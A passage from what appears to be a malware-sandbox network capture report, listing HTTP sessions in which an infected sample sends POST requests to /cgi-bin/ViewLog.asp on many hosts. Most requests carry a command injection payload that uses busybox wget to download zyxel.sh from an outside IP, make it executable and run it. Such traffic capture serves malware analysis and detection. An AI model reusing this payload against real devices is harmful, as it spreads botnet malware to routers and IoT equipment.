                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.877232075 CET15341OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.004764080 CET15909OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:15.939668894 CET16896OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:31.809612036 CET18868OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:04.573278904 CET20699OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              76192.168.2.234448694.121.185.1348080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:20.415275097 CET2586OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              760192.168.2.234280494.243.213.2278080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.887012959 CET14990OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.230710030 CET14999INHTTP/1.1 404 Not Found
                                                              Date: Tue, 14 Nov 2023 00:48:39 GMT
                                                              Server: DNVRS-Webs
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              761192.168.2.236033494.120.59.2238080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.887073040 CET14990OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              762192.168.2.234956831.195.242.948080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.893407106 CET14991OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.249757051 CET15002INHTTP/1.1 404 Not Found
                                                              Date: Mon, 13 Nov 2023 22:20:00 GMT
                                                              Server: Webs
                                                              X-Frame-Options: SAMEORIGIN
                                                              Cache-Control: no-cache
                                                              Content-Length: 166
                                                              Content-Type: text/html
                                                              Connection: keep-alive
                                                              Keep-Alive: timeout=60, max=99
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              763192.168.2.235827462.169.206.1358080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:00.897595882 CET14991OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              764192.168.2.235309431.13.172.248080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.537991047 CET15015OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.844310999 CET15066INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: en
                                                              Content-Length: 431
                                                              Date: Mon, 13 Nov 2023 21:20:00 GMT
                                                              Keep-Alive: timeout=5
                                                              Connection: keep-alive
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              765192.168.2.233669095.216.16.308080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.540235996 CET15016OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.851841927 CET15117INHTTP/1.1 500 Server Error
                                                              Date: Mon, 13 Nov 2023 21:20:01 GMT
                                                              X-Content-Type-Options: nosniff
                                                              Content-Encoding: gzip
                                                              Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                              Cache-Control: no-cache,no-store,must-revalidate
                                                              X-Hudson-Theme: default
                                                              Referrer-Policy: same-origin
                                                              Content-Type: text/html;charset=utf-8
                                                              Set-Cookie: JSESSIONID.abbbbb75=node08ckunv2fkx191bb9vmv41584p284905.node0;Path=/;HttpOnly
                                                              X-Hudson: 1.395
                                                              X-Jenkins: 2.168
                                                              X-Jenkins-Session: fc74c7a1
                                                              X-Frame-Options: sameorigin
                                                              X-Instance-Identity: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAiJOdNZeqzDIMrDN+bWNK8FNbdI/xTYBNal/doOgs1+PF2v5/Ma5DX7K6FwNLzKBQf05LCju6FnRt4eEF7/lnWlyEcdykmoZSmsUgNJVB52P2vmcMUf+9yN9qq3iYP5UxMnSAEdOgO9CISJVrgp4dJvapWyHaJMRk8N7HVkgf5DdIQSwDC7nrGWNipQw5yQSPQ8hGs1kwkwBV0+RV0sJtgHpXlFhH+cju78ltZo7bD1cN5UZ+lAVvdaiqAcg5e6ev07UfGUrpvsgNxSwWtavZN6jEglZD7hkNtlbC6F8O7t54pwOv4fkbYkGGt6u6YHiB0tAsm4OTT+udD7lK+s/4aQIDAQAB
                                                              Content-Length: 3093
                                                              Connection: close
                                                              Server: Jetty(9.4.z-SNAPSHOT)
                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 ff c5 5b fd 72 db b8 11 ff bb 79 0a 1c 9b 4e 7c 33 21 69 c9 b2 fc 11 5b bd c4 e7 4c 72 93 8b 5d db 69 da e9 74 6e 20 12 12 61 93 04 0f 00 65 bb 4f d3 67 e9 93 75 17 00 29 4a a2 64 d9 72 72 99 44 22 c0 c5 6f 3f b1 bb 20 95 17 2f e0 0f 21 f0 f7 e8 87 9f cf 4e ae fe 79 7e 4a 12 9d a5 83 23 f7 c9 68 4c 24 53 5f 2e 3e 1d 7b a1 d2 54 f3 28 1c 45 7b bd 68 8f 76 3c 12 53 4d 7d 29 84 2e 65 7a ec 55 63 a6 cc 70 81 7c 00 6c 80 97 f9 3c d2 5c a7 6c f0 0b cb 6f 78 ae c8 bf dc c5 bf 8f 42 7b e3 28 e5 f9 0d 70 06 1c a5 ef 53 a6 12 c6 b4 47 12 c9 46 8b c8 61 a4 54 98 d2 7b 51 6a 3f 12 59 26 f2 00 66 3c a2 ef 0b 76 ec 69 76 a7 43 33 0e 9f 00 6b c8 9e 0f 2e 12 a9 90 cf 07 07 b6 2e 44 ae f8 84 f9 63 c9 e3 75 80 13 21 75 54 6a c2 23 91 2f c5 1e d1 09 de 0f e0 a3 c2 e3 19 1d b3 70 92 c7 41 c6 23 29 94 18 e9 c0 62 54 f8 46 b7 63 6f 98 d2 e8 c6 b3 dc 32 aa 6e fc 19 4e
                                                              Data Ascii: [ryN|3!i[Lr]itn aeOgu)JdrrD"o? /!Ny~J#hL$S_.>{T(E{hv<SM}).ezUcp|l<\loxB{(pSGFaT{Qj?Y&f<vivC3k..Dcu!uTj#/pA#)bTFco2nN


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              766192.168.2.235792485.247.246.1318080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.542277098 CET15017OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:01.891598940 CET15134INHTTP/1.1 400 Bad Request
                                                              Connection: close
                                                              Content-Length: 0


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              767192.168.2.234483831.136.105.2138080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.560161114 CET15017OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:02.569442987 CET15155OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:04.549187899 CET15425OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:08.516640902 CET15927OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:16.451659918 CET16915OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:32.321499109 CET18898OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:04.573263884 CET20699OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              768192.168.2.234205295.111.35.568080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:01.563905954 CET15018OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:03.269356012 CET15297OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
